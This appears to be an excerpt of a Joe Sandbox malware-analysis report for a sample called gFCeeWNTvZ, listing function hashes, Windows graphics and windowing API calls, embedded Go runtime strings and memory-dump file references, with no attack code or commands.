                                                                            • Opcode ID: e0acfc1956907b1c726e3272f1f290c9dcdf92ef1be015e6eb987ec471acdd50
                                                                            • Instruction ID: 2166c0fec8160fdcf23276cbfbda69153d91a4fbb368ab464f647e45cf49f8a2
                                                                            • Opcode Fuzzy Hash: e0acfc1956907b1c726e3272f1f290c9dcdf92ef1be015e6eb987ec471acdd50
                                                                            • Instruction Fuzzy Hash: EBC1E3B49087589FDB55DF29C98469ABBF1BF89704F00C99EE98897300D734DA85CF82
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                            • Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: ,cd$,cd$,cd$,cd$,cd$,cd$,cd$,cd$,cd
                                                                            • API String ID: 0-339892999
                                                                            • Opcode ID: 0fa4d00ea122b1a81e076fd873fa0560f6a889ced63be3d20f07704dc0228682
                                                                            • Instruction ID: 1ddd88567b8f70bbd00b5d5b2014a53fbbc7393fae63a5ad54a31b5f61634dc3
                                                                            • Opcode Fuzzy Hash: 0fa4d00ea122b1a81e076fd873fa0560f6a889ced63be3d20f07704dc0228682
                                                                            • Instruction Fuzzy Hash: 6A51CD75A082518BDF11CF2DD88068AB7F1FF9B708F11AA2AE944AB715D730E915CBC1
                                                                            APIs
                                                                              • Part of subcall function 6460A79F: EnumDisplaySettingsW.USER32 ref: 6460A7DC
                                                                            • ChangeDisplaySettingsExW.USER32 ref: 6460A8D5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                            • Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd
                                                                            Similarity
                                                                            • API ID: DisplaySettings$ChangeEnum
                                                                            • String ID: $Computer restart required$Failed to write to registry$Graphics mode failed$Graphics mode not supported$Invalid flags$Invalid parameter$The system uses DualView$Unknown error
                                                                            • API String ID: 1333101904-1192658212
                                                                            • Opcode ID: af2ca54787bd583f984551b9cf1532fd2189e3493a595e00c5430dd22ef789bb
                                                                            • Instruction ID: b7b648b479718ed1ff53332b7b2a45aaa3563233a014b2ba000b28bcd7754222
                                                                            • Opcode Fuzzy Hash: af2ca54787bd583f984551b9cf1532fd2189e3493a595e00c5430dd22ef789bb
                                                                            • Instruction Fuzzy Hash: FC3192B0A043448BCB14CF69C58079EBBF0EFA5768F50CA69E4A9DB390E330D4468F42
                                                                            APIs
                                                                            • GetDC.USER32 ref: 6460B2F3
                                                                            • CreateDIBSection.GDI32 ref: 6460B331
                                                                            • ReleaseDC.USER32 ref: 6460B34D
                                                                            • CreateBitmap.GDI32 ref: 6460B393
                                                                            • CreateIconIndirect.USER32 ref: 6460B454
                                                                            • DeleteObject.GDI32 ref: 6460B466
                                                                            • DeleteObject.GDI32 ref: 6460B472
                                                                            • DeleteObject.GDI32 ref: 6460B3C4
                                                                              • Part of subcall function 64608298: GetLastError.KERNEL32 ref: 646082DF
                                                                              • Part of subcall function 64608298: FormatMessageW.KERNEL32 ref: 64608317
                                                                              • Part of subcall function 64608298: WideCharToMultiByte.KERNEL32 ref: 64608357
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                            • Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd
                                                                            Similarity
                                                                            • API ID: CreateDeleteObject$BitmapByteCharErrorFormatIconIndirectLastMessageMultiReleaseSectionWide
                                                                            • String ID: |
                                                                            • API String ID: 2799049117-2343686810
                                                                            • Opcode ID: 22af9852c379c4d7575f55b8b7632cb9953961f2187284d3f79cbcae83d118f1
                                                                            • Instruction ID: e6dfc101f53f0bffcb151d90b53f43c180f82b0aa41017cfdc907e9a12dc0c54
                                                                            • Opcode Fuzzy Hash: 22af9852c379c4d7575f55b8b7632cb9953961f2187284d3f79cbcae83d118f1
                                                                            • Instruction Fuzzy Hash: B851FF70908318CFEB25DF69C984B9ABBF0AF4A704F00C4ADD98897340D7759A88CF52
                                                                            APIs
                                                                            • GetWindowLongW.USER32 ref: 6460B6D6
                                                                            • GetClientRect.USER32 ref: 6460B6FB
                                                                              • Part of subcall function 6460877D: VerSetConditionMask.KERNEL32 ref: 646087DA
                                                                              • Part of subcall function 6460877D: VerSetConditionMask.KERNEL32 ref: 646087F6
                                                                              • Part of subcall function 6460877D: VerSetConditionMask.KERNEL32 ref: 64608812
                                                                              • Part of subcall function 6460877D: RtlVerifyVersionInfo.NTDLL ref: 64608830
                                                                            • GetDpiForWindow.USER32(00000000), ref: 6460B725
                                                                            • AdjustWindowRectEx.USER32(00000000,00000000), ref: 6460B770
                                                                            • ClientToScreen.USER32 ref: 6460B78C
                                                                            • ClientToScreen.USER32(00000000,00000000), ref: 6460B7A0
                                                                            • SetWindowLongW.USER32 ref: 6460B7B9
                                                                            • SetWindowPos.USER32 ref: 6460B7FB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                            • Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd
                                                                            Similarity
                                                                            • API ID: Window$ClientConditionMask$LongRectScreen$AdjustInfoVerifyVersion
                                                                            • String ID: 4
                                                                            • API String ID: 4217418125-4088798008
                                                                            • Opcode ID: 17d7b0196edb0bd78542e89de870a9565de9d450f6f0fc7354a5d8e53f1302dc
                                                                            • Instruction ID: 72991660b5e62e9fb88cc883b23a07306cfc7d732dec7a01ff09eadeeccb0505
                                                                            • Opcode Fuzzy Hash: 17d7b0196edb0bd78542e89de870a9565de9d450f6f0fc7354a5d8e53f1302dc
                                                                            • Instruction Fuzzy Hash: CE41D8B1A083059FCB04EF69C58869EBBF8EF89714F00892DE898D7345DB749844CF92
                                                                            Strings
                                                                            • runtime: g0 stack [runtime: heapInUse=runtime: pcdata is runtime: preempt g0runtime: totalFree=runtime\.call[0-9]*sampling period=%dsavepoint_exceptionsdp: invalid syntaxsemaRoot rotateLeftskip this directorystopm holding locksstring_is_file_pathstring_is_lon, xrefs: 00A4845B
                                                                            • CreateWaitableTimerEx when creating timer failedInt.GobDecode: encoding version %d not supportedMajorSubsystemVersion is outside 3<-->6 boundaryOut-Of-Bounds Level: '%d', defaulting to NoLevelRat.GobDecode: encoding version %d not supportedSindhi Islamic Repub, xrefs: 00A48580
                                                                            • %, xrefs: 00A485E4
                                                                            • runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=sink factory already registered for scheme %qt_version: need at leat one param, but got %dtls: failed to find any PEM data in key inputtls: internal error: failed to upda, xrefs: 00A4854C
                                                                            • bad g0 stackbad kind: %sbad recoverybigint("%v")block clausebtree.go:671btree.go:754btree.go:764btree.go:774c ap trafficc hs trafficcaller errorcan't happencapitalColorcas64 failedchan receiveclose notifycompare: %+vcontainsrunecontent-typecontext.TODOcountry_, xrefs: 00A484CA
                                                                            • ,-./01235789:;<>?ACFGHKMNOSVYZ"^_`aehmnqtyz| ( * + , / @ P [ ` }!!!=#?${%-%=%d%g%q%s%v%x&&&=&^()(") )$)()*.*/*=+++-+=, ---.-=->.-...\/*///=/c/i00010X0b0o0s0x253031323334353637384041424344454647485363808690: :=::]; <!<-<<<=<><?=#==="> >=>>?>??A0A1A2A3A4AD, xrefs: 00A48485
                                                                            • VirtualQuery for stack base failedprovider already excluded: %s: %swrapTest(t, func(t *testing.T) {^((\d{4}-)?\d{3}-\d{3}(-\d{1})?)?$^[a-zA-Z0-9!#$%&'*+/=?^_`{|}~.-]+$__gnu_cxx::new_allocator::allocateadding nil Certificate to CertPooland or: param type mus, xrefs: 00A48525
                                                                            • runtime.minit: duplicatehandle failed; errno=runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=sink factory already registered for scheme %qt_version: need at leat one param, but got %dtls: failed to find any PEM data in, xrefs: 00A485A7
                                                                            • runtime.minit: duplicatehandle failedruntime: allocation size out of rangeruntime: unexpected SPWRITE function setprofilebucket: profile already setsql: Scan called without calling NextstartTheWorld: inconsistent mp->nextpstrings: Repeat count causes overflows, xrefs: 00A485DB
                                                                            • runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: marked free object in span runtime: mcall called on m->g0 stackruntime:, xrefs: 00A484F1
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1865178433.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                            • Associated: 00000000.00000002.1864937079.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1865649432.0000000001210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1865649432.00000000014AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1865649432.00000000014B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1866253310.00000000019B5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1866277435.00000000019B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1866303995.00000000019C9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1866324743.00000000019D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1866342097.00000000019D3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1866361030.00000000019D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1866381535.00000000019D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1866457177.0000000001A9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1866479431.0000000001AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1866499704.0000000001AA3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1866518430.0000000001AA5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1866538222.0000000001AA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1866557931.0000000001AAB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1866605795.0000000001AAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1866624536.0000000001AAE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1866643863.0000000001AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1866643863.0000000001AC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1866643863.0000000001AE1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1866643863.0000000001AE4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1866643863.0000000001AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1866877045.0000000001AF2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1866895370.0000000001AF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1866895370.0000000001B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_a10000_gFCeeWNTvZ.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: %$,-./01235789:;<>?ACFGHKMNOSVYZ"^_`aehmnqtyz| ( * + , / @ P [ ` }!!!=#?${%-%=%d%g%q%s%v%x&&&=&^()(") )$)()*.*/*=+++-+=, ---.-=->.-...\/*///=/c/i00010X0b0o0s0x253031323334353637384041424344454647485363808690: :=::]; <!<-<<<=<><?=#==="> >=>>?>??A0A1A2A3A4AD$CreateWaitableTimerEx when creating timer failedInt.GobDecode: encoding version %d not supportedMajorSubsystemVersion is outside 3<-->6 boundaryOut-Of-Bounds Level: '%d', defaulting to NoLevelRat.GobDecode: encoding version %d not supportedSindhi Islamic Repub$VirtualQuery for stack base failedprovider already excluded: %s: %swrapTest(t, func(t *testing.T) {^((\d{4}-)?\d{3}-\d{3}(-\d{1})?)?$^[a-zA-Z0-9!#$%&'*+/=?^_`{|}~.-]+$__gnu_cxx::new_allocator::allocateadding nil Certificate to CertPooland or: param type mus$bad g0 stackbad kind: %sbad recoverybigint("%v")block clausebtree.go:671btree.go:754btree.go:764btree.go:774c ap trafficc hs trafficcaller errorcan't happencapitalColorcas64 failedchan receiveclose notifycompare: %+vcontainsrunecontent-typecontext.TODOcountry_$runtime.minit: duplicatehandle failed; errno=runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=sink factory already registered for scheme %qt_version: need at leat one param, but got %dtls: failed to find any PEM data in$runtime.minit: duplicatehandle failedruntime: allocation size out of rangeruntime: unexpected SPWRITE function setprofilebucket: profile already setsql: Scan called without calling NextstartTheWorld: inconsistent mp->nextpstrings: Repeat count causes overflows$runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=sink factory already registered for scheme %qt_version: need at leat one param, but got %dtls: failed to find any PEM data in key inputtls: internal error: failed to upda$runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: marked free object in span runtime: mcall called on m->g0 stackruntime:$runtime: g0 stack [runtime: heapInUse=runtime: pcdata is runtime: preempt g0runtime: totalFree=runtime\.call[0-9]*sampling period=%dsavepoint_exceptionsdp: invalid syntaxsemaRoot rotateLeftskip this directorystopm holding locksstring_is_file_pathstring_is_lon
                                                                            • API String ID: 0-3986399674
                                                                            • Opcode ID: db118c51debb8b848c0a001a6d646536974e2acd7475f49e6b0b1b0eadb45182
                                                                            • Instruction ID: 3a7ce5882c6479292f7aea581d24d732169b7cba1c08359261b9223365e31502
                                                                            • Opcode Fuzzy Hash: db118c51debb8b848c0a001a6d646536974e2acd7475f49e6b0b1b0eadb45182
                                                                            • Instruction Fuzzy Hash: 2881BEB85097019FD310EF64D29975EBBE4BF88708F00892CE4989B346DB79D9498F62
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                            • Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd
                                                                            Similarity
                                                                            • API ID: Virtual$ErrorLastProtectQueryabortfwritevfprintf
                                                                            • String ID: @
                                                                            • API String ID: 1616349570-2766056989
                                                                            • Opcode ID: fdae55f44df54ad847873b0df73a4e3f268ce5ee9adb76a092a9394e43f13077
                                                                            • Instruction ID: 9e0d6672c3fcfc9b39a93dd72e7bd94e9e8b2bda23d8cb2d541a2a85f03da3ec
                                                                            • Opcode Fuzzy Hash: fdae55f44df54ad847873b0df73a4e3f268ce5ee9adb76a092a9394e43f13077
                                                                            • Instruction Fuzzy Hash: 8C4137B190C3419FDB11EF29C48565EFBE0FF96358F51892EE8988B214E734E854CB92
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                            • Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd
                                                                            Similarity
                                                                            • API ID: Message$ActiveDispatchPeekPropStateTranslateWindow
                                                                            • String ID: `:ad
                                                                            • API String ID: 1098235094-94877694
                                                                            • Opcode ID: 6b4daecc32117496cb22e13426dffc7ea040e6c427d3d38e188f9edf3e98030c
                                                                            • Instruction ID: 893a9ba0832886e63f4c01581edf47c081ddb0a9f75bb26455985c2c0c5d4a68
                                                                            • Opcode Fuzzy Hash: 6b4daecc32117496cb22e13426dffc7ea040e6c427d3d38e188f9edf3e98030c
                                                                            • Instruction Fuzzy Hash: D24187B1908385DBDB04AFA6C5846AEBBF5FF44B10F00D82DE8959B201DB70D888CB52
                                                                            APIs
                                                                            • glfwDestroyWindow.GLFW.3927611081(?,?,00000001,64613040,64633024,?,646030E9), ref: 64602D75
                                                                            • glfwDestroyCursor.GLFW.3927611081(?,?,00000001,64613040,64633024,?,646030E9), ref: 64602D88
                                                                            • free.MSVCRT ref: 64602DC4
                                                                            • free.MSVCRT ref: 64602DE5
                                                                            • free.MSVCRT ref: 64602E2B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                            • Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd
                                                                            Similarity
                                                                            • API ID: free$Destroyglfw$Cursor.Window.
                                                                            • String ID: 0cd$ ;cd
                                                                            • API String ID: 2442548815-1884057578
                                                                            • Opcode ID: 341a6af4c31061e3084781ecad43557952b8b93f01e5a17f2d00a79e995cda9f
                                                                            • Instruction ID: 9aad1b5e57044b7d2b94080ccc180e97156aa84a46e9e744f830eeb9d27d8246
                                                                            • Opcode Fuzzy Hash: 341a6af4c31061e3084781ecad43557952b8b93f01e5a17f2d00a79e995cda9f
                                                                            • Instruction Fuzzy Hash: 4121A7706087908BFB15AF6AC294799BBE4FF15B44F40A92ED5808BB80DB35DCC48B56
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                            • Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 10a3dd7ca98561c705222fd88babd9a87f93af03a2b099b42f0238ef1699d099
                                                                            • Instruction ID: e9857d6c81e66214a173a1493ea557c90cea33299e3cb8046c12e10172541d74
                                                                            • Opcode Fuzzy Hash: 10a3dd7ca98561c705222fd88babd9a87f93af03a2b099b42f0238ef1699d099
                                                                            • Instruction Fuzzy Hash: 9B412BB0518781DFEB16DF6ACA8076AB7F4EB56B04F01A41CE48493608E7B5C884DF5A
                                                                            APIs
                                                                              • Part of subcall function 646086AB: VerSetConditionMask.KERNEL32 ref: 6460870F
                                                                              • Part of subcall function 646086AB: VerSetConditionMask.KERNEL32 ref: 6460872B
                                                                              • Part of subcall function 646086AB: VerSetConditionMask.KERNEL32 ref: 64608747
                                                                              • Part of subcall function 646086AB: RtlVerifyVersionInfo.NTDLL ref: 64608765
                                                                            • CreateRectRgn.GDI32(00000000), ref: 6460B90B
                                                                            • GetWindowLongW.USER32 ref: 6460B95B
                                                                            • SetWindowLongW.USER32 ref: 6460B97D
                                                                            • SetLayeredWindowAttributes.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6460B9A7
                                                                            • DeleteObject.GDI32 ref: 6460B9B3
                                                                            • GetWindowLongW.USER32(00000000), ref: 6460B9CD
                                                                            • SetWindowLongW.USER32 ref: 6460B9EF
                                                                            • RedrawWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,6460C8D5,00000000,00000000), ref: 6460BA19
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                            • Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Long$ConditionMask$AttributesCreateDeleteInfoLayeredObjectRectRedrawVerifyVersion
                                                                            • String ID:
                                                                            • API String ID: 612219794-0
                                                                            • Opcode ID: 5d7e6b9cc34daab646a0d86b1bc3fc4d1a29992f629cdd476340fd9e23b7a474
                                                                            • Instruction ID: 44e4981ab1a89db8cfa399fa1c146b8c8643086fc116cd7b941efe6b6b07ab75
                                                                            • Opcode Fuzzy Hash: 5d7e6b9cc34daab646a0d86b1bc3fc4d1a29992f629cdd476340fd9e23b7a474
                                                                            • Instruction Fuzzy Hash: A541C8B1509706DFDB10AF69C64879EBBF4EF45725F00CA2CE8A88B281DB749444CF52
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                            • Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
